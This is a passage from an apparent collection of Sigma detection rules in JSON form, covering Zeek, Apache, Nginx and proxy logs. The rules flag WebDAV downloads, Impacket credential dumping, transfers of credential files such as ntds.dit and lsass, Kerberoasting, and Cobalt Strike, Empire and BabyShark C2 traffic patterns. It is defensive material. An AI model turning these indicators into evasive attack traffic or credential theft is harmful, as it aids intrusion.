    "content": "title: Executable from Webdav\nid: aac2fd97-bcba-491b-ad66-a6edf89c71bf\nstatus: test\ndescription: 'Detects executable access via webdav6. Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/'\nreferences:\n    - http://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html\n    - https://github.com/OTRF/detection-hackathon-apt29\nauthor: 'SOC Prime, Adam Swan'\ndate: 2020-05-01\nmodified: 2021-11-27\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    product: zeek\n    service: http\ndetection:\n    selection_webdav:\n        - c-useragent|contains: 'WebDAV'\n        - c-uri|contains: 'webdav'\n    selection_executable:\n        - resp_mime_types|contains: 'dosexec'\n        - c-uri|endswith: '.exe'\n    condition: selection_webdav and selection_executable\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/network/zeek/zeek_http_susp_file_ext_from_susp_tld.yml",
    "content": "title: HTTP Request to Low Reputation TLD or Suspicious File Extension\nid: 68c2c604-92ad-468b-bf4a-aac49adad08c\nstatus: experimental\ndescription: |\n    Detects HTTP requests to low reputation TLDs (e.g. .xyz, .top, .ru) or ending in suspicious file extensions (.exe, .dll, .hta), which may indicate malicious activity.\nreferences:\n    - https://www.howtogeek.com/137270/50-file-extensions-that-are-potentially-dangerous-on-windows\n    - https://www.spamhaus.org/reputation-statistics/cctlds/domains/\nauthor: '@signalblur, Corelight'\ndate: 2025-02-26\ntags:\n    - attack.initial-access\n    - attack.command-and-control\nlogsource:\n    product: zeek\n    service: http\ndetection:\n    # Suspicious TLD in the 'host' field OR malicious file extension in the 'uri' field.\n    selection_suspicious_tld:\n        host|endswith:\n            - '.bid'\n            - '.by'\n            - '.cf'\n            - '.click'\n            - '.cm'\n            - '.ga'\n            - '.gq'\n            - '.ir'\n            - '.kp'\n            - '.loan'\n            - '.ml'\n            - '.mm'\n            - '.party'\n            - '.pw'\n            - '.ru'\n            - '.su'\n            - '.sy'\n            - '.tk'\n            - '.top'\n            - '.tv'\n            - '.ve'\n            - '.work'\n            - '.xyz'\n    selection_malicious_ext:\n        uri|endswith:\n            - '.bat'\n            - '.bin'\n            - '.cmd'\n            - '.cpl'\n            - '.dll'\n            - '.dylib'\n            - '.elf'\n            - '.exe'\n            - '.hta'\n            - '.iso'\n            - '.jar'\n            - '.js'\n            - '.lnk'\n            - '.msi'\n            - '.pif'\n            - '.ps1'\n            - '.py'\n            - '.reg'\n            - '.scr'\n            - '.sh'\n            - '.so'\n            - '.vbs'\n            - '.wsf'\n    selection_malicious_mime:\n        resp_mime_types:\n            - 'application/vnd.microsoft.portable-executable'\n            - 'application/x-bat'\n            - 'application/x-dosexec'\n            - 'application/x-elf'\n            - 'application/x-iso9660-image'\n            - 'application/x-java-archive'\n            - 'application/x-ms-shortcut'\n            - 'application/x-msdos-program'\n            - 'application/x-msdownload'\n            - 'application/x-python-code'\n            - 'application/x-sh'\n    condition: selection_suspicious_tld and 1 of selection_malicious_*\nfalsepositives:\n    - Rare legitimate software downloads from low quality TLDs\nlevel: medium\n"
  },
  {
    "path": "rules/network/zeek/zeek_http_webdav_put_request.yml",
    "content": "title: WebDav Put Request\nid: 705072a5-bb6f-4ced-95b6-ecfa6602090b\nstatus: test\ndescription: A General detection for WebDav user-agent being used to PUT files on a WebDav network share. This could be an indicator of exfiltration.\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/17\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-05-02\nmodified: 2024-03-13\ntags:\n    - attack.exfiltration\n    - attack.t1048.003\nlogsource:\n    product: zeek\n    service: http\ndetection:\n    selection:\n        user_agent|contains: 'WebDAV'\n        method: 'PUT'\n    filter:\n        id.resp_h|cidr:\n            - '10.0.0.0/8'\n            - '127.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/network/zeek/zeek_rdp_public_listener.yml",
    "content": "title: Publicly Accessible RDP Service\nid: 1fc0809e-06bf-4de3-ad52-25e5263b7623\nstatus: test\ndescription: |\n    Detects connections from routable IPs to an RDP listener. Which is indicative of a publicly-accessible RDP service.\nauthor: Josh Brower @DefensiveDepth\ndate: 2020-08-22\nmodified: 2024-03-13\ntags:\n    - attack.lateral-movement\n    - attack.t1021.001\nlogsource:\n    product: zeek\n    service: rdp\ndetection:\n    selection:\n        id.orig_h|cidr:\n            - '::1/128'  # IPv6 loopback\n            - '10.0.0.0/8'\n            - '127.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - '2620:83:8000::/48'\n            - 'fc00::/7'  # IPv6 private addresses\n            - 'fe80::/10'  # IPv6 link-local addresses\n    # approved_rdp:\n      # dst_ip:\n        # - x.x.x.x\n    condition: not selection # and not approved_rdp\nfalsepositives:\n    - Although it is recommended to NOT have RDP exposed to the internet, verify that this is a) allowed b) the server has not already been compromised via some brute force or remote exploit since it has been exposed to the internet. Work to secure the server if you are unable to remove it from being exposed to the internet.\nlevel: high\n"
  },
  {
    "path": "rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml",
    "content": "title: Remote Task Creation via ATSVC Named Pipe - Zeek\nid: dde85b37-40cd-4a94-b00c-0b8794f956b5\nrelated:\n    - id: f6de6525-4509-495a-8a82-1f8b0ed73a00\n      type: derived\nstatus: test\ndescription: Detects remote task creation via at.exe or API interacting with ATSVC namedpipe\nreferences:\n    - https://web.archive.org/web/20230409194125/https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html\nauthor: 'Samir Bousseaden, @neu5rn'\ndate: 2020-04-03\nmodified: 2022-12-27\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.lateral-movement\n    - attack.persistence\n    - car.2013-05-004\n    - car.2015-04-001\n    - attack.t1053.002\nlogsource:\n    product: zeek\n    service: smb_files\ndetection:\n    selection:\n        path: '\\\\\\*\\IPC$'\n        name: 'atsvc'\n        # Accesses: '*WriteData*'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/network/zeek/zeek_smb_converted_win_impacket_secretdump.yml",
    "content": "title: Possible Impacket SecretDump Remote Activity - Zeek\nid: 92dae1ed-1c9d-4eff-a567-33acbd95b00e\nstatus: test\ndescription: 'Detect AD credential dumping using impacket secretdump HKTL. Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml'\nreferences:\n    - https://web.archive.org/web/20230329153811/https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html\nauthor: 'Samir Bousseaden, @neu5ron'\ndate: 2020-03-19\nmodified: 2021-11-27\ntags:\n    - attack.credential-access\n    - attack.t1003.002\n    - attack.t1003.004\n    - attack.t1003.003\nlogsource:\n    product: zeek\n    service: smb_files\ndetection:\n    selection:\n        path|contains|all:\n            - '\\'\n            - 'ADMIN$'\n        name|contains: 'SYSTEM32\\'\n        name|endswith: '.tmp'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml",
    "content": "title: First Time Seen Remote Named Pipe - Zeek\nid: 021310d9-30a6-480a-84b7-eaa69aeb92bb\nrelated:\n    - id: 52d8b0c6-53d6-439a-9e41-52ad442ad9ad\n      type: derived\nstatus: test\ndescription: This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes\nreferences:\n    - https://twitter.com/menasec1/status/1104489274387451904\nauthor: Samir Bousseaden, @neu5ron, Tim Shelton\ndate: 2020-04-02\nmodified: 2022-12-27\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: zeek\n    service: smb_files\ndetection:\n    selection:\n        path: '\\\\\\\\\\*\\\\IPC$' # Looking for the string \\\\*\\IPC$\n    filter_keywords:\n        - 'samr'\n        - 'lsarpc'\n        - 'winreg'\n        - 'netlogon'\n        - 'srvsvc'\n        - 'protected_storage'\n        - 'wkssvc'\n        - 'browser'\n        - 'netdfs'\n        - 'svcctl'\n        - 'spoolss'\n        - 'ntsvcs'\n        - 'LSM_API_service'\n        - 'HydraLsPipe'\n        - 'TermSrv_API_service'\n        - 'MsFteWds'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Update the excluded named pipe to filter out any newly observed legit named pipe\nlevel: high\n"
  },
  {
    "path": "rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml",
    "content": "title: Suspicious PsExec Execution - Zeek\nid: f1b3a22a-45e6-4004-afb5-4291f9c21166\nrelated:\n    - id: c462f537-a1e3-41a6-b5fc-b2c2cef9bf82\n      type: derived\nstatus: test\ndescription: detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one\nreferences:\n    - https://web.archive.org/web/20230329171218/https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html\nauthor: Samir Bousseaden, @neu5ron, Tim Shelton\ndate: 2020-04-02\nmodified: 2022-12-27\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: zeek\n    service: smb_files\ndetection:\n    selection:\n        path|contains|all:\n            - '\\\\'\n            - '\\IPC$'\n        name|endswith:\n            - '-stdin'\n            - '-stdout'\n            - '-stderr'\n    filter:\n        name|startswith: 'PSEXESVC'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/network/zeek/zeek_smb_converted_win_susp_raccess_sensitive_fext.yml",
    "content": "title: Suspicious Access to Sensitive File Extensions - Zeek\nid: 286b47ed-f6fe-40b3-b3a8-35129acd43bc\nrelated:\n    - id: 91c945bc-2ad1-4799-a591-4d00198a1215\n      type: derived\nstatus: test\ndescription: Detects known sensitive file extensions via Zeek\nreferences:\n    - Internal Research\nauthor: Samir Bousseaden, @neu5ron\ndate: 2020-04-02\nmodified: 2025-10-17\ntags:\n    - attack.collection\nlogsource:\n    product: zeek\n    service: smb_files\ndetection:\n    selection:\n        name|endswith:\n            - '.pst'\n            - '.ost'\n            - '.msg'\n            - '.nst'\n            - '.oab'\n            - '.edb'\n            - '.nsf'\n            - '.bak'\n            - '.dmp'\n            - '.kirbi'\n            # - '\\groups.xml'  # Commented out: groups.xml is accessed legitimately by Group Policy processing; high FP rate in enterprise environments\n            - '.rdp'\n    condition: selection\nfalsepositives:\n    - Help Desk operator doing backup or re-imaging end user machine or backup software\n    - Users working with these data types or exchanging message files\nlevel: medium\n"
  },
  {
    "path": "rules/network/zeek/zeek_smb_converted_win_transferring_files_with_credential_data.yml",
    "content": "title: Transferring Files with Credential Data via Network Shares - Zeek\nid: 2e69f167-47b5-4ae7-a390-47764529eff5\nrelated:\n    - id: 910ab938-668b-401b-b08c-b596e80fdca5\n      type: similar\nstatus: test\ndescription: Transferring files with well-known filenames (sensitive files with credential data) using network shares\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\nauthor: '@neu5ron, Teymur Kheirkhabarov, oscd.community'\ndate: 2020-04-02\nmodified: 2021-11-27\ntags:\n    - attack.credential-access\n    - attack.t1003.002\n    - attack.t1003.001\n    - attack.t1003.003\nlogsource:\n    product: zeek\n    service: smb_files\ndetection:\n    selection:\n        name:\n            - '\\mimidrv'\n            - '\\lsass'\n            - '\\windows\\minidump\\'\n            - '\\hiberfil'\n            - '\\sqldmpr'\n            - '\\sam'\n            - '\\ntds.dit'\n            - '\\security'\n    condition: selection\nfalsepositives:\n    - Transferring sensitive files for legitimate administration work by legitimate administrator\nlevel: medium\n"
  },
  {
    "path": "rules/network/zeek/zeek_susp_kerberos_rc4.yml",
    "content": "title: Kerberos Network Traffic RC4 Ticket Encryption\nid: 503fe26e-b5f2-4944-a126-eab405cc06e5\nstatus: test\ndescription: Detects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting\nreferences:\n    - https://adsecurity.org/?p=3458\nauthor: sigma\ndate: 2020-02-12\nmodified: 2021-11-27\ntags:\n    - attack.credential-access\n    - attack.t1558.003\nlogsource:\n    product: zeek\n    service: kerberos\ndetection:\n    selection:\n        request_type: 'TGS'\n        cipher: 'rc4-hmac'\n    computer_acct:\n        service|startswith: '$'\n    condition: selection and not computer_acct\nfalsepositives:\n    - Normal enterprise SPN requests activity\nlevel: medium\n"
  },
  {
    "path": "rules/web/product/apache/web_apache_segfault.yml",
    "content": "title: Apache Segmentation Fault\nid: 1da8ce0b-855d-4004-8860-7d64d42063b1\nstatus: test\ndescription: Detects a segmentation fault error message caused by a crashing apache worker process\nreferences:\n    - http://www.securityfocus.com/infocus/1633\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-02-28\nmodified: 2021-11-27\ntags:\n    - attack.impact\n    - attack.t1499.004\nlogsource:\n    service: apache\n    definition: 'Requirements: Must be able to collect the error.log file'\ndetection:\n    keywords:\n        - 'exit signal Segmentation Fault'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/web/product/apache/web_apache_threading_error.yml",
    "content": "title: Apache Threading Error\nid: e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c\nstatus: test\ndescription: Detects an issue in apache logs that reports threading related errors\nreferences:\n    - https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-01-22\nmodified: 2021-11-27\ntags:\n    - attack.initial-access\n    - attack.lateral-movement\n    - attack.t1190\n    - attack.t1210\nlogsource:\n    service: apache\n    definition: 'Requirements: Must be able to collect the error.log file'\ndetection:\n    keywords:\n        - '__pthread_tpp_change_priority: Assertion `new_prio == -1 || (new_prio >= fifo_min_prio && new_prio <= fifo_max_prio)'\n    condition: keywords\nfalsepositives:\n    - 3rd party apache modules - https://bz.apache.org/bugzilla/show_bug.cgi?id=46185\nlevel: medium\n"
  },
  {
    "path": "rules/web/product/nginx/web_nginx_core_dump.yml",
    "content": "title: Nginx Core Dump\nid: 59ec40bb-322e-40ab-808d-84fa690d7e56\nstatus: test\ndescription: Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.\nreferences:\n    - https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps\n    - https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-05-31\nmodified: 2023-05-08\ntags:\n    - attack.impact\n    - attack.t1499.004\nlogsource:\n    service: nginx\ndetection:\n    keywords:\n        - 'exited on signal 6 (core dumped)'\n    condition: keywords\nfalsepositives:\n    - Serious issues with a configuration or plugin\nlevel: high\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_download_susp_dyndns.yml",
    "content": "title: Download from Suspicious Dyndns Hosts\nid: 195c1119-ef07-4909-bb12-e66f5e07bf3c\nstatus: test\ndescription: Detects download of certain file types from hosts with dynamic DNS names (selected list)\nreferences:\n    - https://www.alienvault.com/blogs/security-essentials/dynamic-dns-security-and-potential-threats\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-11-08\nmodified: 2023-05-18\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.t1105\n    - attack.t1568\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-uri-extension:\n            - 'exe'\n            - 'vbs'\n            - 'bat'\n            - 'rar'\n            - 'ps1'\n            - 'doc'\n            - 'docm'\n            - 'xls'\n            - 'xlsm'\n            - 'pptm'\n            - 'rtf'\n            - 'hta'\n            - 'dll'\n            - 'ws'\n            - 'wsf'\n            - 'sct'\n            - 'zip'\n            # If you want to add more extensions - see https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/\n        cs-host|endswith:\n            - '.hopto.org'\n            - '.no-ip.org'\n            - '.no-ip.info'\n            - '.no-ip.biz'\n            - '.no-ip.com'\n            - '.noip.com'\n            - '.ddns.name'\n            - '.myftp.org'\n            - '.myftp.biz'\n            - '.serveblog.net'\n            - '.servebeer.com'\n            - '.servemp3.com'\n            - '.serveftp.com'\n            - '.servequake.com'\n            - '.servehalflife.com'\n            - '.servehttp.com'\n            - '.servegame.com'\n            - '.servepics.com'\n            - '.myvnc.com'\n            - '.ignorelist.com'\n            - '.jkub.com'\n            - '.dlinkddns.com'\n            - '.jumpingcrab.com'\n            - '.ddns.info'\n            - '.mooo.com'\n            - '.dns-dns.com'\n            - '.strangled.net'\n            - '.adultdns.net'\n            - '.craftx.biz'\n            - '.ddns01.com'\n            - '.dns53.biz'\n            - '.dnsapi.info'\n            - '.dnsd.info'\n            - '.dnsdynamic.com'\n            - '.dnsdynamic.net'\n            - '.dnsget.org'\n            - '.fe100.net'\n            - '.flashserv.net'\n            - '.ftp21.net'\n            - '.http01.com'\n            - '.http80.info'\n            - '.https443.com'\n            - '.imap01.com'\n            - '.kadm5.com'\n            - '.mysq1.net'\n            - '.ns360.info'\n            - '.ntdll.net'\n            - '.ole32.com'\n            - '.proxy8080.com'\n            - '.sql01.com'\n            - '.ssh01.com'\n            - '.ssh22.net'\n            - '.tempors.com'\n            - '.tftpd.net'\n            - '.ttl60.com'\n            - '.ttl60.org'\n            - '.user32.com'\n            - '.voip01.com'\n            - '.wow64.net'\n            - '.x64.me'\n            - '.xns01.com'\n            - '.dyndns.org'\n            - '.dyndns.info'\n            - '.dyndns.tv'\n            - '.dyndns-at-home.com'\n            - '.dnsomatic.com'\n            - '.zapto.org'\n            - '.webhop.net'\n            - '.25u.com'\n            - '.slyip.net'\n    condition: selection\nfalsepositives:\n    - Software downloads\nlevel: medium\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_download_susp_tlds_blacklist.yml",
    "content": "title: Download From Suspicious TLD - Blacklist\nid: 00d0b5ab-1f55-4120-8e83-487c0a7baf19\nrelated:\n    - id: b5de2919-b74a-4805-91a7-5049accbaefe\n      type: similar\nstatus: test\ndescription: Detects download of certain file types from hosts in suspicious TLDs\nreferences:\n    - https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap\n    - https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf\n    - https://www.spamhaus.org/statistics/tlds/\n    - https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-11-07\nmodified: 2023-05-18\ntags:\n    - attack.initial-access\n    - attack.t1566\n    - attack.execution\n    - attack.t1203\n    - attack.t1204.002\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-uri-extension:\n            - 'exe'\n            - 'vbs'\n            - 'bat'\n            - 'rar'\n            - 'ps1'\n            - 'doc'\n            - 'docm'\n            - 'xls'\n            - 'xlsm'\n            - 'pptm'\n            - 'rtf'\n            - 'hta'\n            - 'dll'\n            - 'ws'\n            - 'wsf'\n            - 'sct'\n            - 'zip'\n            # If you want to add more extensions - see https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/\n        cs-host|endswith:\n            # Symantec / Chris Larsen analysis\n            - '.country'\n            - '.stream'\n            - '.gdn'\n            - '.mom'\n            - '.xin'\n            - '.kim'\n            - '.men'\n            - '.loan'\n            - '.download'\n            - '.racing'\n            - '.online'\n            - '.science'\n            - '.ren'\n            - '.gb'\n            - '.win'\n            - '.top'\n            - '.review'\n            - '.vip'\n            - '.party'\n            - '.tech'\n            - '.xyz'\n            - '.date'\n            - '.faith'\n            - '.zip'\n            - '.cricket'\n            - '.space'\n            # McAfee report\n            - '.info'\n            - '.vn'\n            - '.cm'\n            - '.am'\n            - '.cc'\n            - '.asia'\n            - '.ws'\n            - '.tk'\n            - '.biz'\n            - '.su'\n            - '.st'\n            - '.ro'\n            - '.ge'\n            - '.ms'\n            - '.pk'\n            - '.nu'\n            - '.me'\n            - '.ph'\n            - '.to'\n            - '.tt'\n            - '.name'\n            - '.tv'\n            - '.kz'\n            - '.tc'\n            - '.mobi'\n            # Spamhaus\n            - '.study'\n            - '.click'\n            - '.link'\n            - '.trade'\n            - '.accountant'\n            # Spamhaus 2018 https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/\n            - '.cf'\n            - '.gq'\n            - '.ml'\n            - '.ga'\n            # Custom\n            - '.pw'\n    condition: selection\nfalsepositives:\n    - All kinds of software downloads\nlevel: low\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_download_susp_tlds_whitelist.yml",
    "content": "title: Download From Suspicious TLD - Whitelist\nid: b5de2919-b74a-4805-91a7-5049accbaefe\nrelated:\n    - id: 00d0b5ab-1f55-4120-8e83-487c0a7baf19\n      type: similar\nstatus: test\ndescription: Detects executable downloads from suspicious remote systems\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-13\nmodified: 2023-05-18\ntags:\n    - attack.initial-access\n    - attack.t1566\n    - attack.execution\n    - attack.t1203\n    - attack.t1204.002\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-uri-extension:\n            - 'exe'\n            - 'vbs'\n            - 'bat'\n            - 'rar'\n            - 'ps1'\n            - 'doc'\n            - 'docm'\n            - 'xls'\n            - 'xlsm'\n            - 'pptm'\n            - 'rtf'\n            - 'hta'\n            - 'dll'\n            - 'ws'\n            - 'wsf'\n            - 'sct'\n            - 'zip'\n            # If you want to add more extensions - see https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/\n    filter:\n        cs-host|endswith:\n            - '.com'\n            - '.org'\n            - '.net'\n            - '.edu'\n            - '.gov'\n            - '.uk'\n            - '.ca'\n            - '.de'\n            - '.jp'\n            - '.fr'\n            - '.au'\n            - '.us'\n            - '.ch'\n            - '.it'\n            - '.nl'\n            - '.se'\n            - '.no'\n            - '.es'\n            # Extend this list as needed\n    condition: selection and not filter\nfalsepositives:\n    - All kind of software downloads\nlevel: low\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_downloadcradle_webdav.yml",
    "content": "title: Windows WebDAV User Agent\nid: e09aed7a-09e0-4c9a-90dd-f0d52507347e\nstatus: test\ndescription: Detects WebDav DownloadCradle\nreferences:\n    - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-04-06\nmodified: 2021-11-27\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent|startswith: 'Microsoft-WebDAV-MiniRedir/'\n        cs-method: 'GET'\n    condition: selection\nfalsepositives:\n    - Administrative scripts that download files from the Internet\n    - Administrative scripts that retrieve certain website contents\n    - Legitimate WebDAV administration\nlevel: high\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_f5_tm_utility_bash_api_request.yml",
    "content": "title: F5 BIG-IP iControl Rest API Command Execution - Proxy\nid: b59c98c6-95e8-4d65-93ee-f594dfb96b17\nrelated:\n    - id: 85254a62-22be-4239-b79c-2ec17e566c37\n      type: similar\nstatus: test\ndescription: Detects POST requests to the F5 BIG-IP iControl Rest API \"bash\" endpoint, which allows the execution of commands on the BIG-IP\nreferences:\n    - https://f5-sdk.readthedocs.io/en/latest/apidoc/f5.bigip.tm.util.html#module-f5.bigip.tm.util.bash\n    - https://community.f5.com/t5/technical-forum/icontrolrest-11-5-execute-bash-command/td-p/203029\n    - https://community.f5.com/t5/technical-forum/running-bash-commands-via-rest-api/td-p/272516\nauthor: Nasreddine Bencherchali (Nextron Systems), Thurein Oo\ndate: 2023-11-08\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-method: 'POST'\n        c-uri|endswith: '/mgmt/tm/util/bash'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of the BIG IP REST API to execute command for administration purposes\nlevel: medium\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_hello_world_user_agent.yml",
    "content": "title: Potential Hello-World Scraper Botnet Activity\nid: 1712bafe-be05-4a0e-89d4-17a3ed151bf5\nstatus: experimental\ndescription: |\n    Detects network traffic potentially associated with a scraper botnet variant that uses the \"Hello-World/1.0\" user-agent string.\nreferences:\n    - https://www.greynoise.io/blog/new-scraper-botnet-concentrated-in-taiwan\n    - https://viz.greynoise.io/tags/hello-world-scraper-botnet?days=30\nauthor: Joseph A. M.\ndate: 2025-08-02\ntags:\n    - attack.reconnaissance\n    - attack.t1595\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent: 'Hello-World/1.0'\n        cs-method: 'GET'\n    condition: selection\nfalsepositives:\n    - Legitimate network monitoring or vulnerability scanning tools that may use this generic user agent.\n    - Internal development or testing scripts. Consider filtering by source IP if this is expected from certain systems.\nlevel: medium\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_hktl_baby_shark_default_agent_url.yml",
    "content": "title: HackTool - BabyShark Agent Default URL Pattern\nid: 304810ed-8853-437f-9e36-c4975c3dfd7e\nstatus: test\ndescription: Detects Baby Shark C2 Framework default communication patterns\nreferences:\n    - https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-06-09\nmodified: 2024-02-15\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-uri|contains: 'momyshark\\?key='\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_hktl_cobalt_strike_malleable_c2_requests.yml",
    "content": "title: HackTool - CobaltStrike Malleable Profile Patterns - Proxy\nid: f3f21ce1-cdef-4bfc-8328-ed2e826f5fac\nrelated:\n    - id: 953b895e-5cc9-454b-b183-7f3db555452e\n      type: obsolete\n    - id: 41b42a36-f62c-4c34-bd40-8cb804a34ad8\n      type: obsolete\n    - id: 37325383-740a-403d-b1a2-b2b4ab7992e7\n      type: obsolete\n    - id: c9b33401-cc6a-4cf6-83bb-57ddcb2407fc\n      type: obsolete\nstatus: test\ndescription: Detects cobalt strike malleable profiles patterns (URI, User-Agents, Methods).\nreferences:\n    - https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile\n    - https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100\n    - https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile\n    - https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/\n    - https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile\nauthor: Markus Neis, Florian Roth (Nextron Systems)\ndate: 2024-02-15\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection_amazon_1:\n        c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'\n        cs-method: 'GET'\n        c-uri: '/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books'\n        cs-host: 'www.amazon.com'\n        cs-cookie|endswith: '=csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996'\n    selection_amazon_2:\n        c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'\n        cs-method: 'POST'\n        c-uri: '/N4215/adj/amzn.us.sr.aps'\n        cs-host: 'www.amazon.com'\n    selection_generic_1:\n        c-useragent:\n            - 'Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)'\n            - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E )'\n            - 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08'\n    selection_generic_2:\n        c-useragent|endswith: '; MANM; MANM)'\n    selection_oscp:\n        c-uri|contains: '/oscp/'\n        cs-host: 'ocsp.verisign.com'\n    selection_onedrive:\n        cs-method: 'GET'\n        c-uri|endswith: '\\?manifest=wac'\n        cs-host: 'onedrive.live.com'\n    filter_main_onedrive:\n        c-uri|startswith: 'http'\n        c-uri|contains: '://onedrive.live.com/'\n    condition: 1 of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_hktl_empire_ua_uri_patterns.yml",
    "content": "title: HackTool - Empire UserAgent URI Combo\nid: b923f7d6-ac89-4a50-a71a-89fb846b4aa8\nstatus: test\ndescription: Detects user agent and URI paths used by empire agents\nreferences:\n    - https://github.com/BC-SECURITY/Empire\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-07-13\nmodified: 2024-02-26\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'\n        cs-uri:\n            - '/admin/get.php'\n            - '/news.php'\n            - '/login/process.php'\n        cs-method: 'POST'\n    condition: selection\nfalsepositives:\n    - Valid requests with this exact user agent to server scripts of the defined names\nlevel: high\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_pua_advanced_ip_scanner_update_check.yml",
